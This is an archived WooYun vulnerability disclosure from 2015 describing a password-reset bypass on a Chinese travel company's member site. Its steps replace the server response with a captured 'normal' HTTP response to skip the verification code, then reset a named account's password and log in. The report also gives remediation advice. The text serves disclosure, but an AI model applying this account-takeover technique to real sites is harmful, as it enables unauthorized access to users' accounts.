乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-23: 细节已通知厂商并且等待厂商处理中 2015-07-27: 厂商已经确认,细节仅向厂商公开 2015-08-06: 细节向核心白帽子及相关领域专家公开 2015-08-16: 细节向普通白帽子公开 2015-08-26: 细节向实习白帽子公开 2015-09-10: 细节向公众公开
1998年创立至今,北京金色世纪商旅网络科技股份有限公司积累了丰富的商旅服务专业经验,创建了"D2D" 商旅全程管家服务的全新模式。截止到2014年底,金色世纪拥有36家分支机构、1200名员工、23个机场&高铁金色逸站,向超过200万会员提供"D2D商旅全程管家服务"。未来3—5年,机场&高铁金色逸站将达到50个,基本覆盖省会及其它重点城市。
漏洞地址:
http://member.jsj.com.cn/findpwd?type=1
1、输入目标账户,直接更改返回包为正常响应包跳到第三步,跳过验证码验证环节
正常响应包如下:
HTTP/1.1 200 OKServer: nginx/1.6.0Date: Thu, 23 Jul 2015 09:41:15 GMTContent-Type: text/htmlConnection: keep-aliveExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: MobileCard=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMTSet-Cookie: MobileCardJSJID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMTContent-Length: 5851<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><head> <title>设置æ°å¯ç </title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <link href="http://file.jsj.com.cn/css/member/header_footer.css" rel="stylesheet" type="text/css" media="all"> <link href="http://file.jsj.com.cn/css/member/login.css" rel="stylesheet" type="text/css" media="all"> <link href="http://file.jsj.com.cn/css/public/public.css" rel="stylesheet" type="text/css" media="all"> <link rel="shortcut icon" href="http://file.jsj.com.cn/images/public/favicon.ico" type="image/x-icon"/> <script type="text/javascript" src='http://file.jsj.com.cn/js/member/login.js'></script> <script type="text/javascript" src='http://file.jsj.com.cn/js//jquery.js'></script> <script type="text/javascript" src='http://file.jsj.com.cn/js//jsj.js'></script> <script type="text/javascript" src='http://file.jsj.com.cn/js/member/member.findpwd2.js'></script> </head><body> <div class="top_bg"> <div class="top"> <a href="http://www.jsj.com.cn/"><div class="logo"></div></a> </div> </div> <div class="findpwd_box"> <div class="mt"> <h2>设置æ°å¯ç </h2> <b></b> </div> <div class="mc"> <div class="step"> <ul class="reg_step"> <li class="current"><span></span>éªè¯èº«ä»½</li> <li class="current"><span></span>设置æ°å¯ç </li> <li><span></span>å®æ</li> </ul> </div> <div class="form"> <form action='/index/findpwd3' method='post'> <div class="item"><span class="label">æ°ç»å½å¯ç ï¼</span><div class="left"><input id='newpwd1' type="password" name="newpwd1" /><span class="clr"></span><label class="msg-error"></label></div></div> <div class="item"><span class="label">确认æ°å¯ç ï¼</span><div class="left"><input id='newpwd2' type="password" name="newpwd2" /><span class="clr"></span><label class="msg-error"></label></div></div> <div class="item"><span class="label"> </span><div class="left user_form"><a name="next" class="btnstep">æ交</a></div></div> </form> </div> </div></div><div class="ft"> <div class="foot"> <div class="footer_con"> <div class="contant"> <ul> <li><a href="http://www.jsj.com.cn/BottomLink/about_intro.aspx">å ³äºæ们</a><u>|</u></li> <!--<li><a href="http://www.jsj.com.cn/BottomLink/D2D/index.html"> D2Dæå¡</a><u>|</u></li>--> <li><a href="http://www.jsj.com.cn/sitemap.aspx"> ç½ç«å°å¾</a><u>|</u></li> <!--<li><a href="http://gc.jsj.com.cn/bscrm/ebooking/login.aspx">é åºç»å½</a><u>|</u></li>--> <li><a href="http://www.jsj.com.cn/BottomLink/dfdl.aspx">代çä¸å¿</a><u>|</u></li> <li><a href="http://www.jsj.com.cn/BottomLink/job.aspx">æèä¿¡æ¯</a><u>|</u></li> <li><a href="http://www.jsj.com.cn/Card/index.html">VIPæå¡</a><u>|</u></li> <li><a href="http://www.jsj.com.cn/BottomLink/about_department.aspx">èç³»æ们</a><u>|</u></li> <li><a href="http://www.jsj.com.cn/BottomLink/flink.aspx">åæ é¾æ¥</a></li> <!--<li><a href="http://forum.jsj.com.cn/">ä¼å论å</a></li>--> </ul> </div> <div class="contant_t"> <p>ICPå¤12022924å· äº¬å ¬ç½å®å¤110105017926å· å¢å¼çµä¿¡ä¸å¡ç»è¥è®¸å¯è¯B2-20060235å·</p> <p>Copyright 1998-2015 jsj.com.cn All Rights Reserved. å京éè²ä¸çºªåæ ç½ç»ç§æè¡ä»½æéå ¬å¸çæææ</p> <p>éè²ä¸çºªåæ ç½æä¾å½é èªçæ¥è¯¢ï¼å½é æºç¥¨é¢è®¢ï¼å½é èªçæ¥è¯¢æ¶å»è¡¨ï¼å½é æºç¥¨ä»·æ ¼æ¥è¯¢ï¼è¿æå½é èªçæè¿è¡æè§å®ä¿¡æ¯ï¼å½é èªçå®æ¶æ¥è¯¢æå¡ä¾æ¨éã</p> </div> <!-- <div class="bottom_jp"> <ul> </ul> </div> --> <div class="contant_img" align=center><a href="http://www.jsj.com.cn/promotion/cata-zs/index.htm" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img01.gif" style="padding-right:5px;" /></a><a href="http://www.itrust.org.cn/yz/pjwx.asp?wm=2582501947" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img02.gif" style="padding-right:5px;"/></a><a href="https://search.szfw.org/cert/l/CX20120801001603001683" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img03.gif" style="padding-right:5px;" /></a><a href="http://www.anquan.org/s/www.jsj.com.cn" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img04.gif" /></a></div> </div> </div> </div> <!-- TQ kefu --><script language="JavaScript" src=http://float2006.tq.cn/floatcard?adminid=9556114&sort=0></script><!-- google tongji --><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-21387771-1']); _gaq.push(['_setDomainName', 'jsj.com.cn']); _gaq.push(['_trackPageview']); _gaq.push(['_trackPageLoadTime']); (function () { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();</script><!-- baidu tongji --><script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Ff73a1947fcd9c6158387fc848ecf4b5a' type='text/javascript'%3E%3C/script%3E"));</script></body></html>
2、输入新密码wooyun123,提交直接跳转到登陆状态
土豪账号:13333333333,密码:wooyun123:
1、加强服务器验证逻辑,防止顺序执行绕过2、在最后提交时加入身份验证同步信息
危害等级:中
漏洞Rank:6
确认时间:2015-07-27 20:24
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无